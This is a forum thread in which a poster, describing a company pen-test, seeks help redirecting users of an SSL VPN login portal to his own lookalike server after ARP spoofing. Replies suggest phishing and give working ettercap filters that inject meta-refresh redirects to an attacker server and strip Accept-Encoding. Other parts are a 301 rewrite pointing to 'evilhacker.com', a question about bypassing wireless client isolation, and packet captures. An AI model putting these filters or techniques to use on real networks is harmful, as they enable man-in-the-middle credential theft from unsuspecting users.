Page 1 of 2 12 LastLast
Results 1 to 10 of 11

Thread: Website redirection

  1. #1
    Just burned his ISO
    Join Date
    Jan 2006
    Posts
    11

    Default Website redirection

    Hello folks!

    I am doing a pen-test for my company in their new website access, its a website portal, basically you go the site, log in with your username and password, and you will have access to the whole network, ( not the whole network, only if you are the CTO or the network admin).

    so I was able to catch the username and password using ettercap, but they use something call host checker, so my questionis , how can I redirect an specific website using ettercap?

    I can do arp spoofing and works, but, since I am doing a pen-test, the customer has an option called Host Checker, its a little app that runs on the client machine, and make a ssl tunnel, the app checks for antivirus ( if is not up-to-date you wont be able to log in in their website) so, because of this app, I cannot sniff their password, so, here is my quesiton again, how can I redirect the url to my url? for example, if they go to h**p://access.company.com I want to catch the request and send it to h**p://myapacheserver.com, they will see the same page, actually, I am alrady have everything in place, but I dont know yet how to do the redirection website, any idea??? suggestions?? I am using ettercap, but i am open to use anything to achieve this.

    Thanks!

    <-SeRVer->

  2. #2
    Just burned his ISO
    Join Date
    Jul 2008
    Posts
    15

    Default

    Quote Originally Posted by Server View Post
    if they go to h**p://access.company.com I want to catch the request and send it to h**p://myapacheserver.com, they will see the same page, actually, I am alrady have everything in place
    How about just mail youre victim width some fake message whichs says: check the new extranet (url) but in your html is your url. That's basicly phissing.

    Or if you have an account search voor htmlinjection vunerability's and try to redirect.
    Two things are infinite: the universe and human stupidity;

  3. #3
    Member hawaii67's Avatar
    Join Date
    Feb 2006
    Posts
    318

    Default

    Maybe you could try sth. like this:

    Code:
    if (ip.proto == TCP && tcp.src == 80) {
    replace("</head>", "<meta http-equiv="Refresh" content="1; url=http://myapacheserver.com"></head>");
    msg("Filter Ran.\n");
    }
    Of course you could also filter just for the page h**tp://access.company.com.
    Don't eat yellow snow :rolleyes:

  4. #4
    Jenkem Addict imported_wyze's Avatar
    Join Date
    Jul 2007
    Posts
    1,543

    Default

    IS the AP wired or wireless?
    dd if=/dev/swc666 of=/dev/wyze

  5. #5
    Just burned his ISO
    Join Date
    Jan 2006
    Posts
    11

    Default

    Thanks for the response.

    Well, they do have an AP, but they use the client isolation option ( does anyone know how to break/by pass this option??).

    hawaii67, I didnt try that, beacuse all the traffic will be redirected to my website, so if the client tried to go to google.com I dont want to see my page, only if they want to go to access.mycompany.com

    any other ideas??/

    Thanks!!!

    <-SeRVer->

  6. #6
    Member hawaii67's Avatar
    Join Date
    Feb 2006
    Posts
    318

    Default

    Here's the spoonfilter:

    Code:
    if (ip.src == 'aa.bb.cc.dd' && tcp.src == 80) {
          replace("<head>", "<head> <meta http-equiv="Refresh" content="0; url=http://myapacheserver.com">");
          msg("Replaced URL\n");
    }
    Where aa.bb.cc.dd is the ip address of access.company.com.
    If a nslookup reveals more ip addresses use this instead

    Code:
    if (ip.src == 'aa.bb.cc.dd' || ip.src == 'ee.dd.ff.gg' || ip.src == 'hh.ii.jj.kk') {

    It works fine with me :-)

    Cheers
    Don't eat yellow snow :rolleyes:

  7. #7
    Good friend of the forums
    Join Date
    Feb 2010
    Posts
    328

    Default

    Quote Originally Posted by hawaii67 View Post
    Here's the spoonfilter:
    wonder what a 302 would look like ..

    relpace
    GET / HTTP/1.1
    Host: www.google.com
    HTTP/1.x 200 OK

    with:
    GET / HTTP/1.1
    Host: www.google.com
    HTTP/1.x 301 Moved Permanently
    Location: http://evilhacker.com

  8. #8
    Just burned his ISO
    Join Date
    Jan 2006
    Posts
    11

    Default

    Well, is not working for me, the website runs on https, but acept the request on http and then redirect to https, and I got lost on the transition.

    here is the source of http (80)

    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
    <HTML DIR="LTR">
    <HEAD>
    <link rel="stylesheet" type="text/css" href="ErrorPageTemplate.css" >
    <META NAME="MS.LOCALE" CONTENT="EN-US">
    <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8">
    <META HTTP-EQUIV="MSThemeCompatible" CONTENT="Yes">
    <TITLE>Certificate Error: Navigation Blocked</TITLE>

    <SCRIPT src="errorPageStrings.js" LANGUAGE="javascript" type="text/javascript">
    </SCRIPT>
    <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">
    </script>
    <SCRIPT src="invalidcert.js" LANGUAGE="javascript" type="text/javascript">
    </SCRIPT>

    </HEAD>

    and here is the HTTPS (443)

    <html>
    <head>
    <meta http-equiv="Content-Language">
    <meta http-equiv="Content-Type" content="text/html">
    <meta name="robots" content="none">
    <title>Secure Access SSL VPN</title>

    <script src="/dana-na/css/ds.js"></script>
    <script>
    WriteCSS();
    </script>
    <noscript>
    <link rel="stylesheet" href="/dana-na/css/ds.css">
    </noscript>

    <script>
    <!--
    if (window.top != self) {
    top.location = location;
    }
    if(window.name == "newpincancel" || window.name == "nexttokencancel") {
    window.close();
    }
    //--></script>
    <script src="/dana-na/auth/lastauthserverused.js"></script>
    <script>function deletepreauth() {
    document.cookie = "DSPREAUTH="+ escape("")+ ";path=/dana-na/;expires=12-Nov-1996";
    }
    </script>

    </head>

    I also change the filter for 443, and nothing, and my guess is, I lost the connection or the filter dosent redirect the traffic after the first request on port 80,

    any ideas?

    Thanks!!!

    <-SeRVer->

  9. #9
    Member hawaii67's Avatar
    Join Date
    Feb 2006
    Posts
    318

    Default

    It looks like the code injection doesn't work. The redirection should take place immediately, when the communication is still on port 80.
    Do you get the message "Replaced URL"???

    Did you try this filter:

    Code:
    if (ip.proto == TCP && tcp.dst == 80) {
       if (search(DATA.data, "Accept-Encoding")) {
          replace("Accept-Encoding", "Accept-Rubbish!"); 
              # note: replacement string is same length as original string
          msg("zapped Accept-Encoding!\n");
       }
    }
    
    if (ip.src == 'aa.bb.cc.dd' && tcp.src == 80) {
          replace("<head>", "<head> <meta http-equiv="Refresh" content="0; url=http://myapacheserver.com">");
          replace("<HEAD>", "<HEAD> <meta http-equiv="Refresh" content="0; url=http://myapacheserver.com">");
          msg("Replaced URL\n");
    }
    Don't eat yellow snow :rolleyes:

  10. #10
    Just burned his ISO
    Join Date
    Jan 2006
    Posts
    11

    Default

    Yes, your filter works!! but not in my scenario, I dont know why the redirection doesnt work, I got the message and everything, but the redirecction doesnt accours.

    I point the filter to an private website and redirect to my page and works just fine, here is what I have so far:

    if the user goes to:

    h**p://access.mycompany.com

    they got an the page cannot be displayed error, so

    they need to go to:

    h**p://access.mycompany.com/users

    then they can log in.

    here is the headers of the requests.

    Fri Aug 15 13:26:46 2008 [980716]
    UDP 1.248.5.133:1605 --> 1.248.5.1:53 |

    .............access.mycompany.com.....

    Fri Aug 15 13:26:46 2008 [984471]
    UDP 1.248.5.1:53 --> 1.248.5.133:1605 |

    .............access.mycompany.com................. H...

    Fri Aug 15 13:26:46 2008 [985432]
    TCP 1.248.5.133:4368 --> 11.22.33.44.55:80 | S



    Fri Aug 15 13:26:46 2008 [990727]
    TCP 11.22.33.44.55:80 --> 1.248.5.133:4368 | SA



    Fri Aug 15 13:26:46 2008 [991285]
    TCP 1.248.5.133:4368 --> 11.22.33.44.55:80 | A



    Fri Aug 15 13:26:46 2008 [991496]
    TCP 1.248.5.133:4368 --> 11.22.33.44.55:80 | AP

    GET /users HTTP/1.1.
    Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*.
    Accept-Language: en-us.
    UA-CPU: x86.
    Accept-Encoding: gzip, deflate.
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2; .NET CLR 2.0.50727).
    Host: access.mycompany.com.
    Connection: Keep-Alive.
    .


    Fri Aug 15 13:26:46 2008 [992380]
    TCP 11.22.33.44.55:80 --> 1.248.5.133:4368 | A



    Fri Aug 15 13:26:46 2008 [992668]
    TCP 11.22.33.44.55:80 --> 1.248.5.133:4368 | AP

    HTTP/1.0 301 Moved Permanently.
    Connection: close.
    Location: h**ps://access.mycompany.com/users.
    .


    Fri Aug 15 13:26:46 2008 [992677]
    TCP 11.22.33.44.55:80 --> 1.248.5.133:4368 | FA



    Fri Aug 15 13:26:46 2008 [993214]
    TCP 1.248.5.133:4368 --> 11.22.33.44.55:80 | A



    Fri Aug 15 13:26:46 2008 [993506]
    TCP 1.248.5.133:4368 --> 11.22.33.44.55:80 | FA



    Fri Aug 15 13:26:46 2008 [994067]
    TCP 11.22.33.44.55:80 --> 1.248.5.133:4368 | A



    Fri Aug 15 13:26:46 2008 [996799]
    TCP 1.248.5.133:4369 --> 11.22.33.44.55:443 | S



    Fri Aug 15 13:26:47 2008 [231298]
    TCP 11.22.33.44.55:443 --> 1.248.5.133:4369 | SA



    Fri Aug 15 13:26:47 2008 [335762]
    TCP 11.22.33.44.55:443 --> 1.248.5.133:4369 | R



    Fri Aug 15 13:26:51 2008 [708266]
    TCP 1.248.5.133:4370 --> 11.22.33.44.55:80 | S



    Fri Aug 15 13:26:51 2008 [709319]
    TCP 11.22.33.44.55:80 --> 1.248.5.133:4370 | SA



    Fri Aug 15 13:26:51 2008 [709837]
    TCP 1.248.5.133:4370 --> 11.22.33.44.55:80 | A



    Fri Aug 15 13:26:51 2008 [710034]
    TCP 1.248.5.133:4370 --> 11.22.33.44.55:80 | AP

    GET /users HTTP/1.1.
    Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*.
    Accept-Language: en-us.
    UA-CPU: x86.
    Accept-Encoding: gzip, deflate.
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2; .NET CLR 2.0.50727).
    Host: access.mycompany.com.
    Connection: Keep-Alive.
    .


    Fri Aug 15 13:26:51 2008 [710948]
    TCP 11.22.33.44.55:80 --> 1.248.5.133:4370 | A



    Fri Aug 15 13:26:51 2008 [711230]
    TCP 11.22.33.44.55:80 --> 1.248.5.133:4370 | AP

    HTTP/1.0 301 Moved Permanently.
    Connection: close.
    Location: h**ps://access.mycompany.com/users.

    Thanks for all the help!!!!

Page 1 of 2 12 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •